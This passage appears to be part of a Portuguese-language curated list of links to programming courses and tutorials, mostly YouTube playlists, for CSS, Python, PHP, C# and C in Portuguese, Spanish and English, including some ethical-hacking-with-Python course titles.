- [Curso HTML e CSS 2022 - Front Beginners](https://www.youtube.com/playlist?list=PLuElAIt7y8x0Mp5ng9Ov3ciGh_fEarUkW)
- [Curso de FlexBox CSS - CFBCursos](https://www.youtube.com/playlist?list=PLx4x_zx8csUhDWtEa-AtDAgSSmLObBVaz)
> Cursos para aprender CSS em Inglês
- [CSS Tutorial – Full Course for Beginners](https://www.youtube.com/watch?v=OXGznpKZ_sA&ab_channel=freeCodeCamp.org)
- [CSS Full Course for Beginners | Complete All-in-One Tutorial | 11 Hours](https://www.youtube.com/watch?v=n4R2E7O-Ngo&ab_channel=DaveGray)
- [CSS Full Course - Bro Code](https://www.youtube.com/watch?v=wRNinF7YQqQ&ab_channel=BroCode)
- [CSS Tutorial - Zero to Hero (Complete Course)](https://www.youtube.com/watch?v=1Rs2ND1ryYc&ab_channel=freeCodeCamp.org)
- [HTML & CSS Full Course - Beginner to Pro - SuperSimpleDev](https://www.youtube.com/watch?v=G3e-cpL7ofc&ab_channel=SuperSimpleDev)
- [Learn CSS in 20 Minutes - Web Dev Simplified](https://www.youtube.com/watch?v=1PnVor36_40&ab_channel=WebDevSimplified)
- [CSS Full Course - Includes Flexbox and CSS Grid Tutorials](https://www.youtube.com/watch?v=ieTHC78giGQ&ab_channel=freeCodeCamp.org)
- [Building 10 Websites - From Design to HTML and CSS - Coding Challenge](https://www.youtube.com/watch?v=Rz-rey4Q1bw&t=10659s)
- [HTML & CSS Practices - Playlist for projects](https://www.youtube.com/playlist?list=PLgCTlR71eB4-ZGpajuh01zexg8f9Qd98z)
- [Programming HTML and CSS Projects](https://www.youtube.com/playlist?list=PLai7Iw-TAFJr5IQ83rIo_iSUiWaiXen5G)
- [One Page Full Website Project For Practice | HTML & CSS Responsive Website](https://www.youtube.com/watch?v=ZFQkb26UD1Y)
- [Learn CSS Position In 9 Minutes - Web Dev Simplified](https://www.youtube.com/watch?v=jx5jmI0UlXU&ab_channel=WebDevSimplified)
## 🐍 Sites e cursos para aprender Python
> Sites & E-books para aprender Python
- [Think Python](https://greenteapress.com/wp/think-python/)
- [Think Python 2e](https://greenteapress.com/wp/think-python-2e/)
- [A Byte of Python](https://python.swaroopch.com/)
- [Real Python](https://realpython.com/)
- [Full Stack Python](https://www.fullstackpython.com/)
- [FreeCodeCamp Python](https://www.freecodecamp.org/learn/scientific-computing-with-python/)
- [Dive Into Python 3](https://diveintopython3.net/)
- [Practice Python](https://www.practicepython.org/)
- [The Python Guru](https://thepythonguru.com/)
- [The Coder's Apprentice](https://www.spronck.net/pythonbook/)
- [Python Principles](https://pythonprinciples.com/)
- [Harvard's CS50 Python Video](https://pll.harvard.edu/course/cs50s-introduction-programming-python?delta=0)
- [Cracking Codes With Python](https://inventwithpython.com/cracking/)
- [Learn Python, Break Python](https://learnpythonbreakpython.com/)
- [Google's Python Class](https://developers.google.com/edu/python)
- [Python Like You Mean It](https://www.pythonlikeyoumeanit.com/)
- [Beyond the Basic Stuff with Python](https://inventwithpython.com/beyond/)
- [Automate the Boring Stuff with Python](https://automatetheboringstuff.com/)
- [The Big Book of Small Python Projects](https://inventwithpython.com/bigbookpython/)
- [Learn Python 3 From Scratch](https://www.educative.io/courses/learn-python-3-from-scratch)
- [Python Tutorial For Beginners, Edureka](https://www.edureka.co/blog/python-tutorial/)
- [Microsoft's Introduction to Python Course](https://learn.microsoft.com/en-us/training/modules/intro-to-python/)
- [Beginner's Guide to Python, Official Wiki](https://wiki.python.org/moin/BeginnersGuide)
- [Python for Everybody Specialization, Coursera](https://www.coursera.org/specializations/python)
> Cursos para aprender Python em Português
- [Curso completo de Python - Curso em vídeo](https://www.youtube.com/playlist?list=PLvE-ZAFRgX8hnECDn1v9HNTI71veL3oW0)
- [Curso de Python - CFB Cursos](https://www.youtube.com/playlist?list=PLx4x_zx8csUhuVgWfy7keQQAy7t1J35TR)
- [Curso Completo de Python - Jefferson Lobato](https://www.youtube.com/playlist?list=PLLVddSbilcul-1bAKtMKoL6wOCmDIPzFJ)
- [Curso Python para Iniciantes - Didática Tech](https://www.youtube.com/playlist?list=PLyqOvdQmGdTSEPnO0DKgHlkXb8x3cyglD)
- [Curso de Python - eXcript](https://www.youtube.com/playlist?list=PLesCEcYj003QxPQ4vTXkt22-E11aQvoVj)
- [Curso de Python - Otávio Miranda](https://www.youtube.com/playlist?list=PLbIBj8vQhvm0ayQsrhEf-7-8JAj-MwmPr)
- [Aulas Python - Ignorância Zero](https://www.youtube.com/playlist?list=PLfCKf0-awunOu2WyLe2pSD2fXUo795xRe)
- [Curso de Programação em Python - Prime Cursos do Brasil](https://www.youtube.com/playlist?list=PLFKhhNd35zq_INvuX9YzXIbtpo_LGDzYK)
- [Curso Python p/ Iniciantes - Refatorando](https://www.youtube.com/playlist?list=PLj7gJIFoP7jdirAFg-fHe9HKOnGLGXSHZ)
- [Curso Python Básico - Solyd](https://www.youtube.com/playlist?list=PLp95aw034Wn_WtEmlepaDrw8FU8R5azcm)
- [Curso de Python - Bóson Treinamentos](https://www.youtube.com/playlist?list=PLucm8g_ezqNrrtduPx7s4BM8phepMn9I2)
- [O Melhor Curso de Python - Zurubabel](https://www.youtube.com/playlist?list=PL4OAe-tL47sY8SGhtkGoP0eQd4le3badz)
- [Curso de Python - Hashtag Programação](https://www.youtube.com/playlist?list=PLpdAy0tYrnKyCZsE-ifaLV1xnkXBE9n7T)
- [Curso de Python Essencial para Data Science](https://www.youtube.com/playlist?list=PL3ZslI15yo2qCEmnYOa2sq6VQOzQ2CFhj)
- [Curso de Python do Zero ao Data Scientist](https://www.youtube.com/playlist?list=PLZlkyCIi8bMprZgBsFopRQMG_Kj1IA1WG)
- [Curso de Python moderno + Análise de dados](https://www.youtube.com/playlist?list=PLLWTDkRZXQa9YyC1LMbuDTz3XVC4E9ZQA)
- [Curso de Python 3 - Do básico ao avançado - RfZorzi](https://www.youtube.com/playlist?list=PLqx8fDb-FZDEDg-FOuwNKEpxA0LhzrdhZ)
- [Curso de Python Intermediário / Avançado - HashLDash](https://www.youtube.com/playlist?list=PLsMpSZTgkF5ANrrp31dmQoG0-hPoI-NoX)
- [Curso Python para Machine Learning e Análise de Dados](https://www.youtube.com/playlist?list=PLyqOvdQmGdTR46HUxDA6Ymv4DGsIjvTQ-)
- [Curso de programación Python desde cero](https://www.youtube.com/playlist?list=PLyvsggKtwbLW1j0d5yaCkRF9Axpdlhsxz)
- [Introdução à Ciência da Computação com Python](https://www.youtube.com/playlist?list=PLcoJJSvnDgcKpOi_UeneTNTIVOigRQwcn)
- [Curso de Python - Módulo Tkinter](https://www.youtube.com/playlist?list=PLesCEcYj003ShHnUT83gQEH6KtG8uysUE)
- [Curso Selenium com Python - Eduardo Mendes](https://www.youtube.com/playlist?list=PLOQgLBuj2-3LqnMYKZZgzeC7CKCPF375B)
- [Python - Curso Básico - João Ribeiro](https://www.youtube.com/playlist?list=PLXik_5Br-zO-vShMozvWZWdfcgEO4uZR7)
- [Curso de Python 3 - Caio Dellaqua](https://www.youtube.com/playlist?list=PLnHC9X5I2m1_BHFb8rS950nCZXpua3Dj3)
- [Curso de introdução ao desenvolvimento Web com Python 3 e Django](https://www.youtube.com/playlist?list=PLjv17QYEBJPpd6nI-MXpIa4qR7prKfPQz)
- [Curso Analista de dados Python / Numpy / Pandas](https://www.youtube.com/playlist?list=PL3Fmwz_E1hXRWxIkP843DiDf0ZeqgftTy)
- [Curso de Python Avançado - Portal Hugo Cursos](https://www.youtube.com/playlist?list=PLxNM4ef1Bpxj-fFV_rwrLlPA6eMvZZAXu)
- [Python Tkinter - João Ribeiro](https://www.youtube.com/playlist?list=PLXik_5Br-zO_m8NaaEix1pyQOsCZM7t1h)
- [Curso PYQT5 - Python - Desenvolvendo um sistema do zero](https://www.youtube.com/playlist?list=PLwdRIQYrHHU1MGlXIykshfhEApzkPXgQH)
- [Lógica de Programação com Python](https://www.youtube.com/playlist?list=PLt7yD2z4olT--vM2fOFTgsn2vOsxHE5LX)
- [Curso de Programação Python com Blender](https://www.youtube.com/playlist?list=PL3rePi75166RvuavzR1YU6eo5Q0gvXdI7)
- [Curso SQL com python](https://www.youtube.com/playlist?list=PLLWTDkRZXQa88Opt03kzilhx_NGEYSfFt)
- [Curso de Python - Módulo SQLite - eXcript](https://www.youtube.com/playlist?list=PLesCEcYj003QiX5JaM24ytHrHiOJknwog)
- [Curso Python desde 0](https://www.youtube.com/playlist?list=PLU8oAlHdN5BlvPxziopYZRd55pdqFwkeS)
- [Lógica de Programação Usando Python - Curso Completo](https://www.youtube.com/playlist?list=PL51430F6C54953B73)
- [Curso Python - Edson Leite Araújo](https://www.youtube.com/playlist?list=PLAwKJHUl9-WeOUxsFr9Gej3sqvS7brpMz)
- [Curso Python para hacking - Gabriel Almeida](https://www.youtube.com/playlist?list=PLTt8p5xagieX0sOtwFG-je7y_PA-oTrnY)
- [Curso de Python Orientado a Objetos](https://www.youtube.com/playlist?list=PLxNM4ef1Bpxhm8AfK1nDMWPDYXtmVQN-z)
- [Curso de TDD em Python](https://www.youtube.com/playlist?list=PL4OAe-tL47sZrzX5jISTuNsGWaMqx8uuE)
- [Curso de Python em Vídeo - Daves Tecnolgoia](https://www.youtube.com/playlist?list=PL5EmR7zuTn_Z-I4lLdZL9_wCZJzJJr2pC)
- [Curso de Python Básico - Agricultura Digital](https://www.youtube.com/playlist?list=PLVmqNeV0L_zvTZC3uRvzMpySm4XzDVLHS)
- [Exercícios de Python 3 - Curso em vídeo](https://www.youtube.com/playlist?list=PLHz_AreHm4dm6wYOIW20Nyg12TAjmMGT-)
- [Curso Python- Ignorância Zero](https://www.youtube.com/playlist?list=PLX65ruEX8lOTS_IsLp-STkZLWV9glggDG)
- [Curso Lógica de Programação Com Python - Hora de Programar](https://www.youtube.com/playlist?list=PL8hh5X1mSR2CMd6Y_SCXaNCru2bUoRlT_)
> Cursos para aprender Python em Inglês
- [Learn Python - Full Course for Beginners - freeCodeCamp](https://www.youtube.com/watch?v=rfscVS0vtbw&ab_channel=freeCodeCamp.org)
- [Python Tutorial - Python Full Course for Beginners - Programming with Mosh](https://www.youtube.com/watch?v=_uQrJ0TkZlc&ab_channel=ProgrammingwithMosh)
- [Python Tutorial: Full Course for Beginners - Bro Code](https://www.youtube.com/watch?v=XKHEtdqhLK8&t=1s&ab_channel=BroCode)
- [Python Tutorial for Beginners - Full Course in 12 Hours](https://www.youtube.com/watch?v=B9nFMZIYQl0&ab_channel=CleverProgrammer)
- [Python for Beginners – Full Course freeCodeCamp](https://www.youtube.com/watch?v=eWRfhZUzrAc&ab_channel=freeCodeCamp.org)
- [Python for Everybody - Full University Python Course](https://www.youtube.com/watch?v=8DvywoWv6fI&ab_channel=freeCodeCamp.org)
- [Python Full Course - Amigoscode](https://www.youtube.com/watch?v=LzYNWme1W6Q&ab_channel=Amigoscode)
- [Python Tutorial for Beginners - Learn Python in 5 Hours](https://www.youtube.com/watch?v=t8pPdKYpowI&ab_channel=TechWorldwithNana)
- [Intermediate Python Programming Course - freeCodeCamp](https://www.youtube.com/watch?v=HGOBQPFzWKo&ab_channel=freeCodeCamp.org)
- [Automate with Python – Full Course for Beginners - freeCodeCamp](https://www.youtube.com/watch?v=PXMJ6FS7llk&ab_channel=freeCodeCamp.org)
- [20 Beginner Python Projects](https://www.youtube.com/watch?v=pdy3nh1tn6I&ab_channel=freeCodeCamp.org)
- [Data Structures and Algorithms in Python - Full Course for Beginners](https://www.youtube.com/watch?v=pkYVOmU3MgA&ab_channel=freeCodeCamp.org)
- [Python for Beginners | Full Course - Telusko](https://www.youtube.com/watch?v=YfO28Ihehbk&ab_channel=Telusko)
- [Python for Beginners (Full Course) | Programming Tutorial](https://www.youtube.com/playlist?list=PLsyeobzWxl7poL9JTVyndKe62ieoN-MZ3)
- [Python for Beginners - Microsoft Developer](https://www.youtube.com/playlist?list=PLlrxD0HtieHhS8VzuMCfQD4uJ9yne1mE6)
- [Python RIGHT NOW - NetworkChuck](https://www.youtube.com/playlist?list=PLIhvC56v63ILPDA2DQBv0IKzqsWTZxCkp)
- [Learn Python | 8h Full Course | Learn Python the Simple, Intuitive and Intended Way](https://www.youtube.com/playlist?list=PLvMRWNpDTNwTNwsQmgTvvG2i1znjfMidt)
- [Python Crash Course - Learning Python](https://www.youtube.com/playlist?list=PLiEts138s9P1A6rXyg4KZQiNBB_qTkq9V)
- [Crash Course on Python for Beginners | Google IT Automation with Python Certificate](https://www.youtube.com/playlist?list=PLTZYG7bZ1u6pqki1CRuW4D4XwsBrRbUpg)
- [CS50's Introduction to Programming with Python](https://cs50.harvard.edu/python/2022/)
- [Complete Python tutorial in Hindi](https://www.youtube.com/playlist?list=PLwgFb6VsUj_lQTpQKDtLXKXElQychT_2j)
- [Python Tutorials - Corey Schafer](https://www.youtube.com/playlist?list=PL-osiE80TeTt2d9bfVyTiXJA-UTHn6WwU)
- [Advanced Python - Complete Course](https://www.youtube.com/playlist?list=PLqnslRFeH2UqLwzS0AwKDKLrpYBKzLBy2)
- [Python Tutorials for Absolute Beginners - CS Dojo](https://www.youtube.com/playlist?list=PLBZBJbE_rGRWeh5mIBhD-hhDwSEDxogDg)
- [Learn Python The Complete Python Programming Course](https://www.youtube.com/playlist?list=PL0-4oWTgb_cl_FQ66HvBx0g5-LZjnLl8o)
- [100 Days of Code - Learn Python Programming!](https://www.youtube.com/playlist?list=PLSzsOkUDsvdvGZ2fXGizY_Iz9j8-ZlLqh)
- [Python (Full Course) - QAFox](https://www.youtube.com/playlist?list=PLsjUcU8CQXGGqjSvX8h5JQIymbYfzEMWd)
- [Python Full Course - Jennys Lectures](https://www.youtube.com/playlist?list=PLdo5W4Nhv31bZSiqiOL5ta39vSnBxpOPT)
- [Python Tutorials For Absolute Beginners In Hindi](https://www.youtube.com/playlist?list=PLu0W_9lII9agICnT8t4iYVSZ3eykIAOME)
- [Crash Course on Python by Google](https://www.youtube.com/playlist?list=PLOkt5y4uV6bW46gR0DrBRfkVAhE6RSpZX)
- [NetAcad Python Course Labs](https://www.youtube.com/playlist?list=PL6Tc4k6dl9kLk8cDwImy1Q6a9buJkvsEJ)
- [Data Analysis with Python Course](https://www.youtube.com/playlist?list=PLWKjhJtqVAblvI1i46ScbKV2jH1gdL7VQ)
- [30 day Basic to Advanced Python Course](https://www.youtube.com/playlist?list=PL3DVGRBD_QUrqjmkhf8cK038fiZhge7bu)
- [Python Course - Masai](https://www.youtube.com/playlist?list=PLD6vB9VKZ11lm3iP5riJtgDDtDbd9Jq4Y)
- [Python Hacking Course Beginner To Advance!](https://www.youtube.com/watch?v=Wfe1q7nx8WU&ab_channel=TheHackingCoach)
- [Ethical Hacking using Python | Password Cracker Using Python | Edureka](https://www.youtube.com/watch?v=CV_mMAYzTxw&ab_channel=edureka%21)
- [Complete Python Hacking Course: Beginner To Advance](https://www.youtube.com/watch?v=7T_xVBwFdJA&ab_channel=AleksaTamburkovski)
- [Tools Write Python](https://www.youtube.com/playlist?list=PL0HkYwPRexOaRoD2jO6-0YFTTaED5Ya9A)
- [Python 101 For Hackers](https://www.youtube.com/playlist?list=PLoqUKOWEFR1y6LQNkrssmO1-YN2gjniZY)
- [Python for hackers course](https://www.youtube.com/playlist?list=PLFA5k60XteCmzAGxhfmauety1VbcUk9eh)
- [Black Hat Python for Pentesters and Hackers tutorial](https://www.youtube.com/playlist?list=PLTgRMOcmRb3N5i5gBSjAqJ4c7m1CQDS0X)
- [Python For Hackers](https://www.youtube.com/playlist?list=PLQzKQEJTLWfyyDGV_CQbPGTJn5apS10uN)
- [The Complete Ethical Hacking Course Beginner to Advanced](https://www.youtube.com/playlist?list=PL0-4oWTgb_cniCsTF8hitbZL38NjFRyRr)
- [Python Security - Abdallah Elsokary](https://www.youtube.com/playlist?list=PLCIJjtzQPZJ-k4ADq_kyuyWVSRPC5JxeG)
- [Python Hacking - OccupyTheWeb](https://www.youtube.com/playlist?list=PLpJ5UHZQbpQvXbGzJHxjXH9Y7uxd-tnA7)
- [Python For Hacking - Technical Hacker](https://www.youtube.com/playlist?list=PLb9t9VtleL9WTrk74L4xQIq6LM0ndQBEA)
- [Hacking networks with Python and Scapy](https://www.youtube.com/playlist?list=PLhfrWIlLOoKOc3z424rgsej5P5AP8yNKR)
- [Ethical Hacking With Python](https://www.youtube.com/playlist?list=PLHGPBKzD9DYU10VM6xcVoDSSVzt2MNdKf)
- [Python hacking - Abdul Kamara](https://www.youtube.com/playlist?list=PLmrwFpxY0W1PPRPJrFAJInpOzuB3TLx0K)
## 🐘 Sites e cursos para aprender PHP
> Cursos para aprender PHP em Português
- [Curso de PHP para Iniciantes](https://www.youtube.com/playlist?list=PLHz_AreHm4dm4beCCCmW4xwpmLf6EHY9k)
- [Curso de PHP - Node Studio](https://www.youtube.com/playlist?list=PLwXQLZ3FdTVEITn849NlfI9BGY-hk1wkq)
- [Curso de PHP - CFBCursos](https://www.youtube.com/playlist?list=PLx4x_zx8csUgB4R1dDXke4uKMq-IrSr4B)
- [Curso de PHP 8 Completo](https://www.youtube.com/playlist?list=PLXik_5Br-zO9wODVI0j58VuZXkITMf7gZ)
- [Curso de PHP - eXcript](https://www.youtube.com/playlist?list=PLesCEcYj003TrV2MvUOnmVtMdgIp0C4Pd)
- [Curso de PHP Orientado a Objetos](https://www.youtube.com/playlist?list=PLwXQLZ3FdTVEau55kNj_zLgpXL4JZUg8I)
- [Curso de PHP8 Completo - Intermédio e Avançado](https://www.youtube.com/playlist?list=PLXik_5Br-zO9Z8l3CE8zaIBkVWjHOboeL)
- [Curso de PHP](https://www.youtube.com/playlist?list=PLBFB56E8115533B6C)
- [Curso de POO PHP (Programação Orientada a Objetos)](https://www.youtube.com/playlist?list=PLHz_AreHm4dmGuLII3tsvryMMD7VgcT7x)
- [Curso de PHP 7 Orientado a Objetos](https://www.youtube.com/playlist?list=PLnex8IkmReXz6t1rqxB-W17dbvfSL1vfg)
- [Curso de PHP 7](https://www.youtube.com/playlist?list=PLnex8IkmReXw-QlzKS9zA3rXQsRnK5nnA)
- [Curso de PHP com MySQL](https://www.youtube.com/playlist?list=PLucm8g_ezqNrkPSrXiYgGXXkK4x245cvV)
- [Curso de PHP para iniciantes](https://www.youtube.com/playlist?list=PLInBAd9OZCzx82Bov1cuo_sZI2Lrb7mXr)
- [Curso de PHP 7 e MVC - Micro Framework](https://www.youtube.com/playlist?list=PL0N5TAOhX5E-NZ0RRHa2tet6NCf9-7B5G)
- [Curso de PHP - Emerson Carvalho](https://www.youtube.com/playlist?list=PLIZ0d6lKIbVpOxc0x1c4HpEWyK0JMsL49)
> Cursos para aprender PHP em Espanhol
- [Curso de PHP/MySQL](https://www.youtube.com/playlist?list=PLU8oAlHdN5BkinrODGXToK9oPAlnJxmW_)
- [Curso completo de PHP desde cero a experto](https://www.youtube.com/playlist?list=PLH_tVOsiVGzmnl7ImSmhIw5qb9Sy5KJRE)
- [Curso PHP 8 y MySQL 8 desde cero](https://www.youtube.com/playlist?list=PLZ2ovOgdI-kUSqWuyoGJMZL6xldXw6hIg)
- [Curso de PHP completo desde cero](https://www.youtube.com/playlist?list=PLg9145ptuAij8vIQLU25f7sUSH4E8pdY5)
- [Curso completo PHP y MySQL principiantes-avanzado](https://www.youtube.com/playlist?list=PLvRPaExkZHFkpBXXCsL2cn9ORTTcPq4d7)
- [Curso PHP Básico](https://www.youtube.com/playlist?list=PL469D93BF3AE1F84F)
- [PHP desde cero](https://www.youtube.com/playlist?list=PLAzlSdU-KYwW9eWj88DW55gTi1M5HQo5S)
> Cursos para aprender PHP em Inglês
- [Learn PHP The Right Way - Full PHP Tutorial For Beginners & Advanced](https://www.youtube.com/playlist?list=PLr3d3QYzkw2xabQRUpcZ_IBk9W50M9pe-)
- [PHP Programming Language Tutorial - Full Course](https://www.youtube.com/watch?v=OK_JCtrrv-c&ab_channel=freeCodeCamp.org)
- [PHP For Absolute Beginners | 6.5 Hour Course](https://www.youtube.com/watch?v=2eebptXfEvw&ab_channel=TraversyMedia)
- [PHP For Beginners | 3+ Hour Crash Course](https://www.youtube.com/watch?v=BUCiSSyIGGU&ab_channel=TraversyMedia)
- [PHP Tutorial for Beginners - Full Course | OVER 7 HOURS!](https://www.youtube.com/watch?v=t0syDUSbdfE&ab_channel=EnvatoTuts%2B)
- [PHP And MySQL Full Course in 2022](https://www.youtube.com/watch?v=s-iza7kAXME&ab_channel=Simplilearn)
- [PHP Full Course | PHP Tutorial For Beginners](https://www.youtube.com/watch?v=6EukZDFE_Zg&ab_channel=Simplilearn)
- [PHP Front To Back](https://www.youtube.com/playlist?list=PLillGF-Rfqbap2IB6ZS4BBBcYPagAjpjn)
- [PHP Tutorial for Beginners](https://www.youtube.com/playlist?list=PL4cUxeGkcC9gksOX3Kd9KPo-O68ncT05o)
- [PHP for beginners](https://www.youtube.com/playlist?list=PLFHz2csJcgk_fFEWydZJLiXpc9nB1qfpi)
- [The Complete 2021 PHP Full Stack Web Developer](https://www.youtube.com/playlist?list=PLs-hN447lej6LvquSMoWkGlJAJrhwaVNX)
- [PHP Training Videos](https://www.youtube.com/playlist?list=PLEiEAq2VkUUIjP-QLfvICa1TvqTLFvn1b)
- [PHP complete course with Project](https://www.youtube.com/playlist?list=PLFINWHSIpuivHWnGE8YGw8uFygThFGr3-)
- [PHP Course for Beginners](https://www.youtube.com/playlist?list=PLLQuc_7jk__WTMT4U1qhDkhqd2bOAdxSo)
- [PHP Tutorials Playlist](https://www.youtube.com/playlist?list=PL442FA2C127377F07)
- [PHP Tutorials](https://www.youtube.com/playlist?list=PL0eyrZgxdwhwBToawjm9faF1ixePexft-)
- [PHP Tutorial for Beginners](https://www.youtube.com/playlist?list=PLS1QulWo1RIZc4GM_E04HCPEd_xpcaQgg)
- [PHP 7 Course - From Zero to Hero](https://www.youtube.com/playlist?list=PLCwJ-zYcMM92IlmUrW7Nn79y4LHGfODGc)
- [PHP Tutorials (updated)](https://www.youtube.com/playlist?list=PL0eyrZgxdwhxhsuT_QAqfi-NNVAlV4WIP)
- [PHP & MySQL Tutorial Videos](https://www.youtube.com/playlist?list=PL9ooVrP1hQOFB2yjxFbK-Za8HwM5v1NC5)
- [PHP from intermediate to advanced](https://www.youtube.com/playlist?list=PLBEpR3pmwCazOsFp0xI3keBq7SoqDnxM7)
- [Object Oriented PHP Tutorials](https://www.youtube.com/playlist?list=PL0eyrZgxdwhypQiZnYXM7z7-OTkcMgGPh)
- [PHP OOP Basics Full Course](https://www.youtube.com/playlist?list=PLY3j36HMSHNUfTDnDbW6JI06IrkkdWCnk)
- [Advanced PHP](https://www.youtube.com/playlist?list=PLu4-mSyb4l4SlKcO51aLtyiuOmlEuojvZ)
## 🦚 Sites e cursos para aprender C#
> Cursos para aprender C# em Português
- [Curso de C# - Aprenda o essencial em 5 HORAS](https://www.youtube.com/watch?v=PKMm-cHe56g&ab_channel=VictorLima-GuiadoProgramador)
- [Curso de Programação C#](https://www.youtube.com/playlist?list=PLx4x_zx8csUglgKTmgfVFEhWWBQCasNGi)
- [Curso C# 2021](https://www.youtube.com/playlist?list=PL50rZONmv8ZTLPRyqb37EoPlBpSmVBJWX)
- [Curso de C# para Iniciantes](https://www.youtube.com/playlist?list=PLwftZeDnOzt3VMtat5BTJvP_7qgNtRDD8)
- [Linguagem C#](https://www.youtube.com/playlist?list=PLEdPHGYbHhlcxWx-_LrVVYZ2RRdqltums)
- [C# - De Novato a Profissional](https://www.youtube.com/playlist?list=PLXik_5Br-zO-rMqpRy5qPG2SLNimKmVCO)
- [Curso de C#](https://www.youtube.com/playlist?list=PLesCEcYj003SFffgnOcITHnCJavMf0ArD)
- [Curso de C# - Pildoras Informaticas](https://www.youtube.com/playlist?list=PLU8oAlHdN5BmpIQGDSHo5e1r4ZYWQ8m4B)
- [Curso de C# Básico e Avançado](https://www.youtube.com/playlist?list=PLxNM4ef1BpxgRAa5mGXlCoSGyfYau8nZI)
- [Curso de Programação em C#](https://www.youtube.com/playlist?list=PLO_xIfla8f1wDmI0Vd4YJLKBJhOeQ3xbz)
- [Curso de Programação com C#](https://www.youtube.com/playlist?list=PLucm8g_ezqNoMPIGWbRJXemJKyoUpTjA1)
- [Curso Básico de C#](https://www.youtube.com/playlist?list=PL0YuSuacUEWsHR_a22z31bvA2heh7iUgr)
- [Curso de Desenvolvimento de Sistemas - C# com SQL](https://www.youtube.com/playlist?list=PLxNM4ef1BpxjLIq-eTL8mgROdviCiobs9)
- [Curso de C# - Diego Moisset](https://www.youtube.com/playlist?list=PLIygiKpYTC_400MCSyUlje1ifmFltonuN)
- [C# - Programação Orientada a Objetos](https://www.youtube.com/playlist?list=PLfvOpw8k80Wreysmw8fonLCBw8kiiYjIU)
- [Curso .NET Core C#](https://www.youtube.com/playlist?list=PLs3yd28pfby7WLEdA7GXey47cKZKMrcwS)
- [Curso de C# com Entity - CSharp com SQL](https://www.youtube.com/playlist?list=PLxNM4ef1BpxgIUUueLguueyhx0UuICC3-)
- [Curso de C# com MVC e SQL](https://www.youtube.com/playlist?list=PLxNM4ef1Bpxgilp2iFXI4i2if6Qtg6qFZ)
> Cursos para aprender C# em Espanhol
- [Curso C# de 0 a Experto](https://www.youtube.com/playlist?list=PLvMLybJwXhLEVUlBI2VdmYXPARO2Zwxze)
- [Tutorial C# - Curso básico](https://www.youtube.com/playlist?list=PLM-p96nOrGcakia6TWllPW9lkQmB2g-yX)
- [Aprende a programar en C# desde CERO](https://www.youtube.com/playlist?list=PL8gxzfBmzgexdFa0XZZSZZn2Ogx3j-Qd5)
> Cursos para aprender C# em Inglês
- [C# Tutorial - Full Course for Beginners](https://www.youtube.com/watch?v=GhQdlIFylQ8&ab_channel=freeCodeCamp.org)
- [C# Full Course - Learn C# 10 and .NET 6 in 7 hours](https://www.youtube.com/watch?v=q_F4PyW8GTg&ab_channel=tutorialsEU)
- [C# Tutorial: Full Course for Beginners](https://www.youtube.com/watch?v=wxznTygnRfQ&ab_channel=BroCode)
- [C# Fundamentals for Beginners](https://www.youtube.com/watch?v=0QUgvfuKvWU&ab_channel=MicrosoftDeveloper)
- [C# Tutorial For Beginners - Learn C# Basics in 1 Hour](https://www.youtube.com/watch?v=gfkTfcpWqAY&ab_channel=ProgrammingwithMosh)
- [C# for Beginners | Full 2-hour course](https://www.youtube.com/watch?v=Z5JS36NlJiU&ab_channel=dotnet)
- [C# Programming All-in-One Tutorial Series (6 HOURS!)](https://www.youtube.com/watch?v=qOruiBrXlAw&ab_channel=CalebCurry)
- [Create a C# Application from Start to Finish - Complete Course](https://www.youtube.com/watch?v=wfWxdh-_k_4&ab_channel=freeCodeCamp.org)
- [C# Tutorials](https://www.youtube.com/playlist?list=PL_c9BZzLwBRIXCJGLd4UzqH34uCclOFwC)
- [C# Mastery Course](https://www.youtube.com/playlist?list=PLrW43fNmjaQVSmaezCeU-Hm4sMs2uKzYN)
- [C# Full Course Beginner to Advanced](https://www.youtube.com/playlist?list=PLq5Uz3LSFff8GmtFeoXRZCtWBKQ0kWl-H)
- [C# Tutorial For Beginners & Basics - Full Course 2022](https://www.youtube.com/playlist?list=PL82C6-O4XrHfoN_Y4MwGvJz5BntiL0z0D)
- [C# for Beginners Course](https://www.youtube.com/playlist?list=PL4LFuHwItvKbneXxSutjeyz6i1w32K6di)
- [C# tutorial for beginners](https://www.youtube.com/playlist?list=PLAC325451207E3105)
- [C# Online Training](https://www.youtube.com/playlist?list=PLWPirh4EWFpFYePpf3E3AI8LT4NInNoIM)
- [C# Training](https://www.youtube.com/playlist?list=PLEiEAq2VkUULDJ9tZd3lc0rcH4W5SNSoW)
- [C# for Beginners](https://www.youtube.com/playlist?list=PLdo4fOcmZ0oVxKLQCHpiUWun7vlJJvUiN)
- [C# - Programming Language | Tutorial](https://www.youtube.com/playlist?list=PLLAZ4kZ9dFpNIBTYHNDrhfE9C-imUXCmk)
- [C#.NET Tutorials](https://www.youtube.com/playlist?list=PLTjRvDozrdlz3_FPXwb6lX_HoGXa09Yef)
## 🦉 Sites e cursos para aprender C
> Cursos para aprender C em Português
- [Curso de C - eXcript](https://www.youtube.com/playlist?list=PLesCEcYj003SwVdufCQM5FIbrOd0GG1M4)
- [Programação Moderna em C - Papo Binário](https://www.youtube.com/playlist?list=PLIfZMtpPYFP5qaS2RFQxcNVkmJLGQwyKE)
- [Curso de Linguagem C - Pietro Martins](https://www.youtube.com/playlist?list=PLpaKFn4Q4GMOBAeqC1S5_Fna_Y5XaOQS2)
- [Curso de Programação C Completo - Programe seu futuro](https://www.youtube.com/playlist?list=PLqJK4Oyr5WSjjEQCKkX6oXFORZX7ro3DA)
- [Linguagem C - De aluno para aluno](https://www.youtube.com/playlist?list=PLa75BYTPDNKZWYypgOFEsX3H2Mg-SzuLW)
- [Curso de Linguagem C para Iniciantes - John Haste](https://www.youtube.com/playlist?list=PLGgRtySq3SDMLV8ee7p-rA9y032AU3zT8)
- [Curso de Linguagem C (ANSI)](https://www.youtube.com/playlist?list=PLZ8dBTV2_5HTGGtrPxDB7zx8J5VMuXdob)
- [Curso - Programação com a Linguagem C para iniciantes](https://www.youtube.com/playlist?list=PLbEOwbQR9lqxHno2S-IiG9-lePyRNOO_E)
- [Curso de Programação 3 (C Avançado)](https://www.youtube.com/playlist?list=PLxMw67OGLa0kW_TeweK2-9gXRlMLYzC1o)
- [Curso de C - Diego Moisset](https://www.youtube.com/playlist?list=PLIygiKpYTC_6zHLTjI6cFIRZm1BCT3CuV)
- [Curso de C e C++](https://www.youtube.com/playlist?list=PL5EmR7zuTn_bONyjFxSO4ZCE-SVVNFGkS)
- [Curso de Programação em Linguagem C](https://www.youtube.com/playlist?list=PLucm8g_ezqNqzH7SM0XNjsp25AP0MN82R)
